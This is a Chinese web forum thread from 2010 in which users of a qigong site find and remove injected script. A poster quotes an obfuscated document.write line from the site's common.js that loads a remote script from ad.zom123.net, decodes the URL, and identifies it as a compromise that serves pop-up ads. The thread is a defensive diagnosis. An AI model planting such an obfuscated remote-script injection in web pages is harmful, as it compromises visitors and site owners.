李少波真气运行学术论坛

 找回密码
 会员注册

QQ登录

只需一步,快速开始

微信扫码,快速登录

真气运行学术论坛基本规范

12
返回列表 发新帖
楼主: dipper

能不能不要从新窗口打开。太麻烦了。

[复制链接]
发表于 2010-8-3 09:35:55 | 显示全部楼层
是否和服务商有关,将安全级别提高,可限制新开窗口。
回复

使用道具 举报

 楼主| 发表于 2010-8-5 14:18:04 | 显示全部楼层
请检查 forumdata/cache/common.js 这个文件

看看这段代码: document.write("<\163c"+"ript src='http://\141d"+".\172o"+"m1"+"2\63"+".ne"+"t/ip"+".asp?lo"+"c=lanzhou|yulin'><\/sc"+"ript>");
回复

使用道具 举报

 楼主| 发表于 2010-8-5 14:25:32 | 显示全部楼层
上面这段,转义后得到的准确网址是:http://ad.zom123.net/ip.asp?loc=lanzhou|yulin

请右键查看它的源代码。

很明显是被挂马了哦。
回复

使用道具 举报

 楼主| 发表于 2010-8-5 14:28:06 | 显示全部楼层
源代码中  http://ad.zom123.net/?action=pop  这个URL就是弹广告的转向码
回复

使用道具 举报

发表于 2010-8-5 22:36:38 | 显示全部楼层
清查出来了,是另一个文件,尚在dz服务器被攻击的的时被插了这段弹游戏广告代码,后觉得dz idc不可靠,于5月转移服务器后已使用全新的原始文件,再次上传论坛备份文件的时候,可能不小心把整个论坛备份文件夹上传而带上了这点尾巴。这段代码基本很少弹广告,所以发现的人不多。目前全部文件经过校验,已经没有问题了。多谢dipper网友提醒!
回复

使用道具 举报

 楼主| 发表于 2010-8-6 13:58:24 | 显示全部楼层
嗯,今天正常了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 会员注册

本版积分规则

李少波真气运行学手机app下载

QQ|Archiver|手机版|兰州李少波真气运行研究所 ( 陇ICP备17000019号 )

GMT+8, 2025-3-13 05:37

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表